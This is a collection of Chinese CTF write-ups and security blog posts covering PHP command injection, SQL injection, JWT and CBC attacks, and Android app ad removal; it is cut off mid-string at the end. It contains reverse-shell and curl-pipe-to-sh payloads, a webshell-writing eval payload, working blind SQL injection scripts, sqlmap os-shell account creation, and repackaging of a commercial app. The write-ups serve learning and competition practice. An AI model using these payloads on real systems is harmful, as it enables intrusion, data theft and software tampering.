题目

模拟真实环境在群里出了一道CTF题当作每日一问，代码形如：

<?php
header('Content-Type: text/html; charset=utf-8');
//error_reporting(0);
$upload_dir = 'uploads/';
$isFfmpeg = isset($_POST['isFfmpeg']) ? (boolean)($_POST['isFfmpeg']) : false;
$save = isset($_POST['save']) ? $upload_dir . $_POST['save'] : false;
$filename = isset($_FILES['filename']) ? $_FILES['filename']['name'] : false;
if ($isFfmpeg && isset($_FILES)) {
    if ($filename && $save && $_FILES['filename']["type"] == 'video/blob') {
        if (move_uploaded_file($_FILES['filename']["tmp_name"], $save)) {
            $last_line = exec("ffmpeg -i " . $save . " -hide_banner");
           // echo 'success';
        } else {
            //echo 'error';
            unlink($save);
            unlink($_FILES['filename']['tmp_name']);
        }
    }
} else {
    show_source(__FILE__);
}

环境是oneinstack的集成环境，网站目录位于/data/wwwroot/default/index.php，index.php是root权限写入的。

题解思路

php文件很明确可以看出来两个洞：
1. 任意文件上传
2. 命令注入

首先尝试任意文件上传，直接怼上去shell试试，构造请求包：

访问 http://123.57.223.30/uploads/aa.php 报404，直接访问 http://123.57.223.30/uploads/ 没有这个目录，分析之后发现是move_uploaded_file的问题，当不存在uploads目录时会走else分支。

尝试跨目录../，shell应该在 http://123.57.223.30/aa.php 访问发现还是404。全站应该没有写入权限。只能走命令注入这条路了。

命令注入的关键点在于move_uploaded_file，首先找可写目录，比如/tmp/，因为不知道当前的绝对路径，我们可以用尽可能多的../跨到tmp，形如：

确实可行

这样走到exec之后注入，dnslog带外

这个时候上传的文件名为

尝试常规的bash反弹shell

bash -i >& /dev/tcp/ip/8080 0>&1

发包后没收到shell，因为/的问题，在move_uploaded_file的时候会报错，走不到exec()。

这个时候就是体现姿势的时候了。群友给了几个姿势

/../../../../../tmp/xx;curl 10.10.10.10 |sh ;
../../../../../../tmp/asdfasd.sh;bash $(php -r "print(chr(47));")tmp$(php -r "print(chr(47));")a.sh;
/../../../../../tmp/xx;bash -i >& ${PWD:0:1}dev${PWD:0:1}tcp${PWD:0:1}123.57.223.30${PWD:0:1}8080 0>&1;
echo `echo Lwo=|base64 -d`tmp

1. curl的原理是直接通过管道符执行curl的结果
2. 先传一
   
   

上帝视角

主要就是命令注入和move_uploaded_file在Linux下的绕过。回过头看Linux权限问题

index.php为root所属，其他用户只有读权限，不可写。完美复现实战中碰到的苛刻环境，利用还算简单，重点是通过bash配合其他命令进行绕过特殊字符串。

web4 php

http://119.61.19.212:8082/index.php

error_reporting(E_ALL^E_NOTICE^E_WARNING);
function GetYourFlag(){
    echo file_get_contents("./flag.php");
}

if(isset($_GET['code'])){
    $code = $_GET['code'];
    //print(strlen($code));
    if(strlen($code)>27){ 
        die("Too Long.");
    }

    if(preg_match('/[a-zA-Z0-9_&^<>"']+/',$_GET['code'])) {
        die("Not Allowed.");
    }
    @eval($_GET['code']);
}else{
      highlight_file(__FILE__);
}

过滤字符数字下划线等等 长度小于等于27 然后调用GetYourFlag()函数即可，可以用~按位取反

echo urlencode(~('GetYourFlag'));

得到

%B8%9A%8B%A6%90%8A%8D%B9%93%9E%98

然后函数需要再取反回来

~(%B8%9A%8B%A6%90%8A%8D%B9%93%9E%98)

存到一个变量里，因为过滤，我们用中文来定义变量，我在这用中字

echo urlencode('中');    //%E4%B8%AD

然后用变量存储我们取反回来的GetYourFlag函数，最后通过变量来调用这个函数

$%E4%B8%AD=~(%B8%9A%8B%A6%90%8A%8D%B9%93%9E%98);$%E4%B8%AD();

最后的payload

view-source:http://119.61.19.212:8082/index.php?code=$%E4%B8%AD=~(%B8%9A%8B%A6%90%8A%8D%B9%93%9E%98);$%E4%B8%AD();

web5

laravel的代码审计

路由

app/Http/Controllers/UserController.php 注入

密码解不出来，但是在database/factories/UserFactory.php这个工厂函数中给出来了

继续看 app/Http/Controllers/HomeController.php

登录后要从数据库中拿到key，然后才能上传文件，也就是进入HomeController@uploadss。传文件的文件名经过一层filecheck()过滤之后移动到视图模板的目录里，清晰了，通过上传覆盖原本的模板然后模板注入读flag。

正好/resources/views/auth/uploads/目录有一个template.blade.php模板，而路由中也有控制器去渲染这个模板。

构造表单上传之后发现上传filecheck()过滤了很多东西，不能有php <字样。

首先我们要知道laravel的blade模板是可以自定义php代码的，但是必须是如下格式

@php
    //
@endphp

但是过滤了php关键字，没办法，只能去扒一扒blade的文档了，然后发现了自定义模板标签 https://laravel.com/docs/5.8/blade#extending-blade

牛逼，直接@filedata(‘/flag’)就完事了。

POST /home/uploadss/NotAllow6171 HTTP/1.1
Host: 119.61.19.212:8085
Content-Length: 444
Cache-Control: max-age=0
Upgrade-Insecure-Requests: 1
Origin: null
Content-Type: multipart/form-data; boundary=----WebKitFormBoundaryvJNe9ABsnjeKGhDN
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/76.0.3809.132 Safari/537.36
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3
Accept-Language: zh-CN,zh;q=0.9
Cookie: XSRF-TOKEN=eyJpdiI6IitoWjhwMm1ycmNTWFozSmZTTXJwXC9nPT0iLCJ2YWx1ZSI6IkllczhnNEZodldZbllTN0NmZDErR2I1eXF1bU9mV1wvYklManNuUnQ4YzhJcmlWQ09JVXJPXC9JNHZxVU0xRmdCY0RDbWJHelVwYjQyVjdXQ1FHVlFMMlE9PSIsIm1hYyI6IjNmMGUzZTEwYTA2ZDA2MjJjMDg4OTY5NTI4NDJjNTk2YmQ4N2U4NWYxY2E2ZjU3YWEwNTAwODllMzIyYTU4ZjAifQ%3D%3D; laravel_session=eyJpdiI6InRhRzZmenBJSmFLNHhrb0RlUE5OdVE9PSIsInZhbHVlIjoiZ01qK2JpQURoRHgxbFVrcGc4TE9PK2kycGxSTjlNRzkwK21uVDUxa3UyTW5JYXpIcWJaY2pYbXQwNDc0dklkemNjRmR0aFhZcllmTkRvQXpVUlR3d3c9PSIsIm1hYyI6IjAwMjVkODA3YmY5NDU1Y2U5MDMyMWMwMTI1MTcyMmQ1YTU5NWQzMTE0MGMxMzc0ZWM1NDU4YzQ5MWIyZjI5YTgifQ%3D%3D
Connection: close

------WebKitFormBoundaryvJNe9ABsnjeKGhDN
Content-Disposition: form-data; name="_token"

Z7VZ7FXfNzuzETtQrZ7DeAZCFtbkQl9L8e7ptVin
------WebKitFormBoundaryvJNe9ABsnjeKGhDN
Content-Disposition: form-data; name="files"; filename="template.blade.php"
Content-Type: text/html

@filedata('/flag')
------WebKitFormBoundaryvJNe9ABsnjeKGhDN

Content-Disposition: form-data; name="submit"

Submit
------WebKitFormBoundaryvJNe9ABsnjeKGhDN--

文笔垃圾，措辞轻浮，内容浅显，操作生疏。不足之处欢迎大师傅们指点和纠正，感激不尽。

题目地址 http://152.136.179.79:18084/ 传入id=3为flag的id。

常规联合查询注入

http://152.136.179.79:18084/?id=3 union select 1,2,3

三个字段

http://152.136.179.79:18084/?id=3 union select 1,2,(select table_name from information_schema.tables where table_schema=database())

拿到flag所在的表，继续查列名

http://152.136.179.79:18084/?id=3 union select 1,2,(select column_name from information_schema.columns where table_name='this_1s_th3_fiag_tab13')

死活查不出来，应该是过滤了column关键字，没有列名怎么查出来数据呢？？？

有两种方法
1. order by盲注
2. 子查询

本地测试建表

order by盲注

order by用于根据指定的列对结果集进行排序。一般上是从0-9a-z这样排序，不区分大小写。

先来本地测试一下

可以看到我们构造的数据排在了第一行

仍然在第一行

当拿’q’和’pass’做比较时，我们构造的数据被排在了第二行。由此可以来根据不同的回显来逐位判断。

拿我们这道题来说

1的时候我们的数据在前

2的时候原始数据在前，说明第一位是1

然后判断第二位

1a的时候我们的数据在前

1b的时候原始数据在前，说明第二位是1a

由此逐位判断。

子查询

在无列名的情况下，用子查询可以很简单的将数据跑出来。

子查询是将一个查询语句嵌套在另一个查询语句中。在特定情况下，一个查询语句的条件需要另一个查询语句来获取，内层查询（inner query）语句的查询结果，可以为外层查询（outer query）语句提供查询条件。

这个语句将列名转换为了1,2,3，这个时候列名就已知了，我们可以用子查询将数据归并。

此时就能查出来数据了，然后我们再来看这个题。

我们已知了表名为this_1s_th3_fiag_tab13，但是不知道这个表有几个字段

可以用联合查询的方式来判断字段数。

查出数据

拿到我们这个题里来

payload

http://152.136.179.79:18084/?id=3 union select 1,2,x.2 from (select * from (select 1)a,(select 2)b,(select 3)c,(select 4)d union select * from this_1s_th3_fiag_tab13)x

子查询真是个好东西👍

写在文后

本文介绍了两种无列名注入的方式，很巧妙的在没有列名的情况下查出来数据，在实际利用中更推荐用子查询的方式，毕竟盲注有可能费力不讨好。

文笔垃圾，措辞轻浮，内容浅显，操作生疏。不足之处欢迎大师傅们指点和纠正，感激不尽。

那么更新后迎来的就是满屏的广告，我是真的服。

启动电脑吧！去广告的apk链接在文后。

反编译

AndroidKiller反编译拿到smali源代码。

名称：搜书大师

包名：com.flyersoft.seekbooks

入口：com.flyersoft.WB.SplashActivity

版本信息：Ver：v16.7(160701) SDK：16 TargetSDK：26

启动屏的广告就是程序入口，在com.flyersoft.WB.SplashActivity中。

smali的代码像屎一样，我们用dex2jar来转换成java代码看。

java源码

将apk改名为zip，然后用压缩软件打开后把classes.dex拖出来放到dex2jar的文件夹下。

运行命令d2j-dex2jar.bat classes.dex --force然后生成了classes-dex2jar.jar这个新文件

然后用jd-gui打开新生成的文件看到源代码。

定位到文件

去广告思路

先来谈谈我是怎么定位到调用广告的代码片段的：在启动屏中有关键字跳过，全局搜索就能定位到片段。

然后搜书大师的代码经过了混淆，命名乱七八糟，那么为了提高效率我们需要先来了解一下安卓开发的生命周期。

程序会按照图上的流程来走，那么首先就是onCreate()方法。

可以发现多次调用a()方法，而a又有好几种重载。

我在这直接说下我的几种方法

finish()

让广告的Activity直接退出，但是这样有bug，会导致启动的时候需要点两次才能正常启动。

替换他的广告id

经过我多次编译测试

里面的两个string参数应该是传的广告联盟的id和key，那么我们把他改成错误的就拉不出来广告了。

这种方法没有bug，完美。

更改广告的加载时间

在onADTick()方法中，广告时间是由下面的代码控制的，稍加修改就行了。

paramLong是取得System.currentTimeMillis()是5

那么我们可以将被除数1000.0F改大一点，让他Math.round()之后为0就可以了。

更改smali

我用的是第二种方法，更改掉他的广告id和key

SplashActivity.smali1060行

改为

保存

重新编译

之前用AndroidKiller反编译之后重新编译为apk是一直报错

然后我就用apktool重新来了一遍

注意-r参数，已经确认是-r参数导致的

修改smali代码之后保存

然后你会在com.flyersoft.seekbooks\dist目录下找到你编译好的apk

签名

生成签名

给apk签名

最后的book就是-alias后面带的，必须保持一致

然后就能给手机装上你的book1.apk来尽情看小说了

链接: https://pan.baidu.com/s/1_j1WNl0nglJ2uY9LU833BA 提取码: 6dvi

写在文后

这篇文章也算是自己对安卓逆向的一篇水文把，主要还是记录一下命令和思路。不过顺手挖了一个短信轰炸，一百多条短信给我炸的懵逼…

顺便记下我谷歌的一些资料。

吾爱破解-教我兄弟学Android逆向系列课程+附件导航帖

apktool参数文档

详解Android中Activity的生命周期

题目地址：http://39.100.83.188:8002/

删掉cookie和code字段提示密码错误

burp爆破3位数字

web2

题目地址: http://39.100.83.188:8001/

要求满足

1. username=’w3lc0me_To_ISCC2019′

2. 输入的vaule不在ascii码可见范围内

3. intval($password) < 2333 && intval($password + 1) > 2333

考点在于弱类型和类型转换

查阅chr()相关函数

chr()自动mod256

那么构造我们的脚本生成payload

password就用进制绕过

2334的hex是0x91e

最后的payload

web3

http://39.100.83.188:8065/

title提示二次注入，注入点发生在注册的地方。

注册用户名为admin'#，然后修改密码，用修改后的密码登录admin账号即可拿到flag

重新写文章的用户名被注册了，我在这注册admin'#

修改密码为a

登录admin用户

web4

http://39.100.83.188:8066/ 源代码

通读代码，要求

1. 设置query

2. action=auth

3. $hashed_input要等于$hashed_key

发现$parsed_query = parse_str($query);存在变量覆盖

先说下parse_str为什么会产生变量覆盖，举例

如果你访问的是http://127.0.0.1/1.php?query=&a=b，那么会导致$a的值被覆盖为b，因为parse_str的作用就是解析字符串并且注册成变量，它在注册变量之前不会验证当前变量是否存在，所以会直接覆盖掉当前作用域中原有的变量。

那么再来看这道题就比较明朗，最关键的在于$hashed_input要等于$hashed_key，那么我们构造payload

将hashed_key的值覆盖为字符串a加密的sha256，然后此时再传入key=a这样满足条件即输出flag{7he_rea1_f1@g_15_4ere}

web6

题目地址: http://39.100.83.188:8053/

查看源代码中出现接口，http://39.100.83.188:8053/static/js/common.js

发现一段疑似公钥加密方式的代码，先记住

提示只有admin可以看到信息，登录注册，抓包发现有header中多了

考点应该是jwt(Json Web Token攻击)，加解密地址https://jwt.io/

jwt解码后分为3个部分，由三个点（.）分隔

分别为：

解密下iscc19后面的那段

算法

payload

具体的攻击原理我贴一段百度的。

我们知道JWT的header部分中，有签名算法标识alg

而alg是用于签名算法的选择，最后保证用户的数据不被篡改。

但是在数据处理不正确的情况下，可能存在alg的恶意篡改

例如由于网站的不严谨，我们拿到了泄露的公钥pubkey

我们知道如果签名算法为RS256，那么会选择用私钥进行签名，用公钥进行解密验证

假设我们只拿到了公钥，且公钥模数极大，不可被分解，那么如何进行攻击呢？

没有私钥我们是几乎不可能在RS256的情况下篡改数据的，因为第三部分签名需要私钥，所以我们可以尝试将RS256改为HS256

此时即非对称密码变为对称加密

我们知道非对称密码存在公私钥问题

而对称加密只有一个key

此时如果以pubkey作为key对数据进行篡改，则会非常简单，而如果后端的验证也是根据header的alg选择算法，那么显然正中下怀。

首先我们要拿到公钥/pubkey/{md5(username+password)}也就是这个链接，对于我的用户名和密码都是chuyu，那么应该是这样的http://39.100.83.188:8053/pubkey/93a18e397fc3beb55420bf4656b18720

拿到

由于公钥有时可以被攻击者获取到，所以攻击者可以修改header中算法为HS256，然后使用RSA公钥对数据进行签名。 后端代码会使用RSA公钥+HS256算法进行签名验证。 即更改算法为HS256，此时即不存在公钥私钥问题，因为对称密码算法只有一个key 此时即我们可以任意访问的pubkey 故此我立刻写出了构造脚本

将priv改为admin，输出

ps:jwt包应该这样安装pip2 install pyjwt

报错'The specified key is an asymmetric key or x509 certificate and'修改/usr/local/lib/python2.7/dist-packages/jwt/algorithms.py的151行prepare_key()为如下

然后输出eyJhbGciOiJIUzI1NiIsInR5cCI6IkpXVCJ9.eyJuYW1lIjoiY2h1eXUiLCJwcml2IjoiYWRtaW4ifQ.Moa94NN1yEun6lmsEaQeaMGnUt0X_b_McQWhSSe7O_M，修改头为这个访问/list拿到admin的信息

访问拿到flag

隐藏的信息

8进制转十进制，然后base64解密。直接上解密脚本

V2VsbCBkb25lIQoKIEZsYWc6IElTQ0N7TjBfMG5lX2Nhbl9zdDBwX3kwdX0K

解密后

Welcome

下载下来是无后缀文件，加zip后缀，解压出welcome.txt

看到这个我是一脸懵逼，经大佬提示明白为二进制 给出脚本

倒立屋

IsCc_2019反转9102_cCsI提交

Keyes’ secret

键盘密码 参考https://ctf-wiki.github.io/ctf-wiki/crypto/classical/others/#_23

解密脚本

解出来

FLAG{ISCC KEYBOARD CIPHER}

ps:我真的觉得加密好烦

Aesop’s secret

给了一张gif图片 用ps打开 发现

stegsolve file format

aes加密 密匙是ISCC也就是图片中的

两次aes解密后flag{DugUpADiamondADeepDarkMine}

他们能在一起吗？

送分题 扫码得出base64UEFTUyU3QjBLX0lfTDBWM19ZMHUlMjElN0Q= 解密后PASS{0K_I_L0V3_Y0u!}

然后图片分离压缩包，解压密码是上面那个，解压后拿到flag

Reverse answer to everything

sha1 得到了一个神秘的二进制文件。寻找文件中的flag，解锁宇宙的秘密。 注意：将得到的flag变为ISCC{flag}形式提交。

拖到ida中，main函数f5。

not_the_flag(v4)跟进

将kdudpehsha1加密后就是flag，注意格式。

简单Python

给了个pyc文件，用uncompyle反编译下

最好使用Linux pip安装 pip install uncompyle

uncompyle6 pyc.pyc

自定义了加密方法encode

给出我的逆向解密脚本

脚本写的像屎，将就看，解密出来win和Linux的编码不一样，显示都不全，最后flag还得靠猜ISCC{simple_pyc}

Rev02

.net程序 放到dnspy中

博主是个小菜，也是第一次跟着大佬去参加线下比赛，收获颇丰，因为菜，只能记录部分，后面再等大佬的WriteUp吧~

小东参加的是西南赛区的比赛，大佬是真的有，不过题目也是真的怪(我菜)，基本是WEB方向的题，类似于杂项，脑洞也是出奇的大，有的题目还是值得学习，后面等搭建好docker环境在做尝试。

0x00 彩蛋题

主办方说做了这道题会有i春秋的神秘礼物一份，因此小东做了一下，过程也是极其流畅。

找到注入点：http://172.16.9.50/Blog/Diary.aspx?DiaryID=2

SQLMAP跑一下，--dump数据库发现没有flag，然后--os-shell得到命令行权限，执行netstat -an发现3389端口开放，然后执行添加用户操作

mstsc登陆远程管理admin admin
我的电脑中全盘搜索flag得到flag.txt

0x01 base32解密

这个题目的思路就是，扫描发现robots.txt访问发现一个目录，访问发现有一个302的跳转状态码，遂Burpsuite拦截，得到如下代码

当时懵逼了一会儿，全是大写，又和Base64编码类似，突然想到之前做过的一道题base32的编码，python脚本简单写了，flag就出来了

0x02 逻辑漏洞

很多题目都是把这个作为突破口，抓包修改当前账户购买商品价格为负数，当前用户的积分余额就会越来越多，然后这道题就购买了flag

0x03 后面的题目

没做出来…其中一道题目涉及很多方向的问题，非常的杂，废了很长的时间，后面的题目，小东也只是能够触摸一二，但是未能深入，最后我们小组排名第8

0x04 待补充

…

0x05 总结

通过此次比赛，发现自己真的很菜，之前没怎么系统地学习过，专注WEB安全，加油吧，小菜鸡，向大佬学习~

                                         PHP的变量解析问题。

0x01  变量解析的两种语法

当字符串用双引号或heredoc结构定义时，其中的变量将会被解析。共有两种语法规则：一种简单规则，一种复杂规则。

以上这段话摘自php手册。在这里不谈论简单规则。

0x02  复杂（花括号）语法

任何具有string表达的标量变量，数组单元或对象属性都可使用此语法。只需简单地像在string以外的地方那样写出表达式，然后用花括号{和}把它括起来即可。由于{无法被转义，只有$紧挨着{时才会被识别。可以用{\$来表达{$。

note:

函数、方法、静态类变量和类常量只有在 PHP 5 以后才可在 {$} 中使用。然而，只有在该字符串被定义的命名空间中才可以将其值作为变量名来访问。只单一使用花括号 ({}) 无法处理从函数或方法的返回值或者类常量以及类静态变量的值。

看完php手册，来看一些例子。

$test = "coder";
echo "$test"; //输出 ChaBug
echo "$tests"; //爆出错误信息

这里我们的本意是第二条输出 coders，然而php会返回一个notice，Undefined variable: tests。说明这里$tests被当作一个变量来执行了。这个时候就要用到复杂语法，”${test}s” 这个时候就会输出 coders。{}在这里定义了标识符，也就是变量名字的边界，告诉””在花括号内的才是变量。

也就是说 {}为变量名定义了一个边界。也就是说”{${test}}”和”${test}”效果是一样的。

 0x03  实际的用途

前几天ChaBug群里的小伙伴放了一个图片，当时知道是复杂语法也就没在看了，今天在这里仔细研究一下。代码如下：
$str=@(string)$_GET['chabug'];
eval('$str="'.addslashes($str).'";');

这里我们在url中输入 ?chabug={${phpinfo()}}即可在页面返回php的相关信息。或者${${phpinfo()}}也可以，二者的区别就是前者返回一条警告，后者返回两条警告。小伙伴发的那道题在下面加了一条可以利用一下payload ：

0x04  利用原理

我们先来弄懂{${phpinfo()}}的原理。查阅了php手册以及一些资料得知，通常一个变量的定义必须是以下划线或者英文字母开头，且变量名只能包含下划线字母和数字。很明显{phpinfo()}里面包含了圆括号，并不是一个变量名，然而却可以执行。是因为在php中，可以接受函数的返回值作为变量名，而phpinfo()的返回值为TRUE也就是说{${phpinfo()}}其实等于$TRUE。我们来验证一下。
var_dump(1 == phpinfo()); //返回bool(true)并且返回php相关信息
var_dump($TRUE == ${phpinfo()}); //返回bool(true)并且返回php相关信息和两条警告

通过这个验证我们可以获取两条信息，一、在以函数返回值为变量名称定义变量时，函数先执行并返回相关值，{}花括号获取返回值并连接$定义变量。二、$TRUE==${phpinfo()}，说明{${phpinfo()}}并不是定义了一个变量$phpinfo()而是$TRUE。

所以我们就很容易理解为什么在第三阶段中可以执行phpinfo()的原因了。我们来拆分代码，方便理解。
eval(‘$str=”‘.addslashes($str).'”;’);
eval(‘$str=”{${phpinfo()}}”;’);
这个时候双引号就会把{}里的内容当作变量，而又因为先执行phpinfo()函数并将返回值赋给变量名所以会页面会返回php相关信息。这里不太容易理解，我们可以自己在本地试验一下
$str = "{${phpinfo()}}";//可以理解为$str = $true 而 $true是先执行了phpinfo()函数才产生的。
因为eval()函数会将引号内的字符串当作php代码去执行，所以就相当于执行了我们的上述代码，即返回了phpinfo和一条警告。
$test1 = "Welcome to ChaBug";
function chabug(){
$str = 'test1';
return $str;
}
$test2 = "{${chabug()}}";
echo $test2;//这里输出的是Welcome to ChaBug
BB了半天，觉得这一段代码足够说明问题….自行理解。
理解了{${phpinfo()}}的原理接下来说小伙伴的第二个payload为什么行不通。这个payload的想法是好的，但是构造的方法不对。payload作者的想法是利用在单引号中如果需要返回特殊字符，必须进行转义，即 echo ‘\”;返回 ‘ 。利用这一点来绕过addslashes()函数的转义，以达到命令执行写入webshell文件。但是这里为什么不行呢。
因为源代码利用了点(.)这个连接符。当我们的输入包含单引号({${system(‘whoami’)}})并且被addslashes()函数转义带入eval函数中是这样的。
eval(‘$str=”{${system(\’whoami\’)}}”;’);也就相当于
eval(‘$str=”‘
{${system(\’whoami\’)}}
‘”;’);
也就是说\’根本没有被解析回’。还是用代码来说简单一些。
$chabug = "\'";
echo '$str="'.$chabug.'";';//返回$str="\'";
即 echo ‘$str=”‘;+echo $chabug;+echo ‘”;’;
这样就能理解为什么0x03中的payload并不能实现的原因了。但是是有办法实现绕过addslashes这个函数的，下面分享一种方法但不仅限一种。
利用火狐插件或者burp,这里使用hackbar。
get:http://localhost/test.php?chabug={${@eval($_POST[cmd])}}
post: cmd=fputs(fopen(‘shell.php’,’w+’),’‘);
即可在同目录下生成shell文件。
appcms2.0.101存在同样的命令执行漏洞，可以尝试复现有助于理解。
欢迎各位师傅指点交流。

参考链接:http://php.net/manual/zh/language.types.string.php

最后说一句，PHP真他妈是世界上最好的语言！不接受反驳。

F12 修改maxlength为4

web01

strcmp()函数遇到数组会返回NULL 而PHP是弱类型语言  在==比较的时候，如果有数值的话会先将字符串转换为数值在进行比较，而NULL转换成数值为0，所以绕过题目限制。

payload:  get: /?password[]=1

本地的诱惑

右键查看源代码即可。

你能跨过去吗？

 复制callback参数内容 base64解码得到<script>alert(“key:/%nsfocusXSStest%/”)</script>  复制key的内容 提交得到flag；

一切都是套路

访问/index.php.txt得到源代码:

变量覆盖漏洞($$):

get: ?_200=flag

post: flag=x

你能绕过吗

更改f参数的内容发现会报错，猜测是文件包含漏洞

用php伪协议来读取flag.经过测试发现题目过滤了php 所以用PHP://filter/convert.base64-encode/resource=index,解码读到flag。

 web02

 burp截断 利用client-ip: 127.0.0.1修改客户端ip以欺骗服务器 得到flag。

请ping我的ip 看你能Ping通吗？

 根据题目要求 ping 猜测是命令注入漏洞，过滤了; & |等特殊符号  利用%0a(换行)进行绕过

用  ls / 命令查看目录

最后在 /home目录下发现flag   payload: /?ip=127.0.0.1%0a cat /home/flag得到flag

Please give me username and password!

/index.php.txt 页面泄漏源代码，利用php弱类型进行绕过;

?username[]=0&password=1e9

SQL注入的艺术

点击个人信息页面,宽字节注入，可以盲注也可以联合查询注入。 当时写了个脚本盲注

import re
import requests
cname = ''
flag = ''
url = 'http://118.190.152.202:8015/index.php?id=1%df'
payload = "' and ascii(substr(({p}),{m},1))={n}%23"
list = [64,94,96,124,176,40,41,48,49,50,51,52,53,54,55,56,57,173,175,95,65,66,67,68,69,70,71,72,73,74,75,76,77,78,79,80,81,82,83,84,85,86,87,88,89,90,97,98,99,100,101,102,103,104,105,106,107,108,109,110,111,112,113,114,115,116,117,118,119,120,121,122,44]
for  i in range(1,46):
    for ss in list:
        p = payload.format(p='select group_concat(column_name) from information_schema.columns where table_name = 0x61646d696e73',m=i,n=ss)
        u = requests.get(url+p)
        if "head.jpg" in u.content:
            cname += chr(ss)
            print cname
            break
for i in range(1,23):
    for l in list:
        pp = payload.format(p='select flag from admins',m=i,n=l)
        u = requests.get(url+pp)
        if "head.jpg" in u.content:
            flag += chr(l)
            print flag
            break

试试看

/show.php?img=1.jpg  复制图片地址  文件包含漏洞。

由于不包含.jpg文件提示File not found！ resource可以包含两个文件 所以绕过

payload:  php://filter/convert.base64-encode/resource=../flag.php|1.jpg 查看源代码得到flag。

Collide

 直接给出源代码，由于key的值不知道 但是我们知道key的 长度为46，利用hash长度扩展攻击

编码后的username:  guest%80%00%00%00%00%98%01%00%00%00%00%00%00admin

 用hashdump求出md5值 5f585093a7fe86971766c3d25c43d0eb

Only admin can see flag

cbc字节翻转攻击

/index.txt看到源代码 搜了一下 发现cbc字节翻转攻击 附带脚本。

import urllib
import base64
#a:2:{s:8:"userna
#me";s:5:"admiN";
#s:8:"password";s
#:6:"123456";}
cipher=base64.b64decode(urllib.unquote("uA900LR7DpuWKx7K5GyvwtBhhc4Q9OVGMoXMYfIxo4lw8qgJmlbjELEU%2FeOWSGR31Zyi8BkxJ4knpng7j4sMUQ%3D%3D"))
iv=base64.b64decode(urllib.unquote("9qcxkpyvwymnvOp49F2Uvg%3D%3D"))
newcipher=cipher[0:13]+chr(ord(cipher[13])^ord('N')^ord('n'))+cipher[14:]
print urllib.quote(base64.b64encode(newcipher))
jiamingwen=base64.b64decode(urllib.unquote('twZ92UO5Kx1ne5hEeGTCum1lIjtzOjU6ImFkbWluIjtzOjg6InBhc3N3b3JkIjtzOjY6IjEyMzQ1NiI7fQ=='))
mingwen = 'a:2:{s:8:"userna'
newiv = ''
for i in range(0,16):
    newiv += chr(ord(mingwen[i])^ord(jiamingwen[i])^ord(iv[i])) 
print urllib.quote(base64.b64encode(newiv))

先用admiN 123456登录

在地址栏处回车(不要刷新，否则cipher 和iv会刷新)并用burp抓包。

将iv 和 cipher放入脚本中 得到新的 cipher 修改cookie中的 cipher 得到报错信息中的 cipher。

 复制报错信息中的cipher到脚本中 运行得到新的iv  修改iv为新的iv 且cipher为第一次脚本运行得到的cipher。得到flag；

 为什么这么简单啊

根据提示利用 xff ip地址伪造和referer 即可进入第二关。

 右键查看源码，发现可疑js文件，浏览找到密码 base64解码 提交得到flag。

ADwAcwBjAHIAaQBwAHQAPgBhAGwAZQByAHQAKAAiAHAAYQBzAHMAdwBvAHIAZAA6AHgAaQBuAHkAaQBqAGkALgBjAG8AbQAiACkAPAAvAHMAYwByAGkAcAB0AD4
解码得到: xinyiji.com

php是世界上最好的语言

用户名随便输 ，密码用php弱类型进行绕过 :QNKCDZO（可以看我之前写过的php知识点总结）

 点击得到

利用全局变量打印出$flag变量即可。

Sqli

题目说的很明确 就是注入了。经过测试发现是盲注 于是写了个脚本跑出密码登录。

解密: u4g009

提示在另一个字段，(真他妈坑啊)，这里直接联合查询注入就可以了。

顺便附上我写的垃圾盲注脚本

import requests
tname = ''
						
pwd = ''
						
url = 'http://118.190.152.202:8011/index.php'
						
payload = "admin' and ascii(substr(({s}),{m},1))={n}#"
						
fuzz = ('0123456789,abcdefghijklmnopqrstuvwxyz')
# for i in range(1,10):
#     for k in fuzz:
#         p = payload.format(s='select group_concat(table_name) from information_schema.tables where table_schema = database()',m=i,n=ord(k))
#         u = requests.post(url,data = {'username':p,'password':'admin'})
#         if 'normal' in u.content:
#             tname += k
#             print tname
#             break
					
for i in range(1,33):

					for k in fuzz:
        p = payload.format(s="select group_concat(pass) from user",m=i,n=ord(k))
        u = requests.post(url,data = {'username':p,'password':'admin'})

					if
							'normal'
									in u.content:
            pwd += k

					print pwd

						break

有种你来绕

根据提示，是mysql的数据库，利用mysql的特性–隐式类型转换，进行盲注得到密码。

写了个脚本跑出密码登录。

import requests
url = "http://118.190.152.202:8019/login.php"
						
payload = "1'-(ascii(mid((passwd)from({0})))={1})-'"
						
password = ''
						
fuzz = 'abcdefghijklmnopqrstuvwxyz0123456789'
						
for i in range(1,33):

					for k in fuzz:
        p = payload.format(i,ord(k))
        u = requests.post(url,data = {'uname':p,'passwd':'admin'})

					if
							not
									'username'
											in u.content:
            password += k

						print password

 解密: nishishabi1438  (我他妈想打死傻逼出题人)

输入flag，执行即可。

web400 Only Admin 是cookie注入，但是自己没怎么看，等其他师傅分享wp再学习一波吧。

What is that?

png 格式 应该是手指下面有 flag

拖进 tweakpng

CRC 报错 可能更改了图片宽度 or 高度

winhex 修改

查看

数字密文

69742773206561737921

hex 编码 解码即可

it's easy!

秘密电报

ABAAAABABBABAAAABABAAABAAABAAABAABAAAABAAAABA

培根密码

ilikeiscc

提交注意大写

重重谍影

Vm0wd2QyVkZOVWRXV0doVlYwZG9WVll3WkRSV2JGbDNXa1JTVjAxWGVGWlZNakExVjBaS2RHVkljRnBXVm5CUVZqQmtTMUl4VG5OaFJtUlhaV3RHTkZkWGRHdFRNVXB6V2toV2FsSnNjRmhhVjNoaFYxWmFjMWt6YUZSTlZtdzBWVEo0YzJGR1NuTlhiR2hYWVd0d2RsUnRlR3RqYkdSMFVteFdUbFp0ZHpCV2EyTXhVekZSZUZkc1ZsZGhlbXhoVm01d1IyTldjRVZTYlVacVZtdHdlbGRyVlRWVk1ERldZMFZ3VjJKR2NIWlpWRXBIVWpGT1dXSkhhRlJTVlhCWFZtMDFkMUl3TlhOVmJGcFlZbGhTV1ZWcVFURlRWbEY0VjIxR2FGWnNjSGxaYWs1clZqSkdjbUo2UWxwV1JWcDZWbXBHVDJNeGNFaGpSazVZVWxWd1dWWnRNVEJXTVUxNFdrVmtWbUpHV2xSWlZFNVRWVVpzYzFadVpGUmlSbHBaVkZaU1ExWlhSalpTYTJSWFlsaENVRll3V21Gak1XUnpZVWRHVTFKV2NGRldha0poV1ZkU1YxWnVTbEJXYldoVVZGUktiMDB4V25OYVJFSm9UVlpXTlZaSE5VOVdiVXB5WTBaYVdtRXhjRE5aTW5oVFZ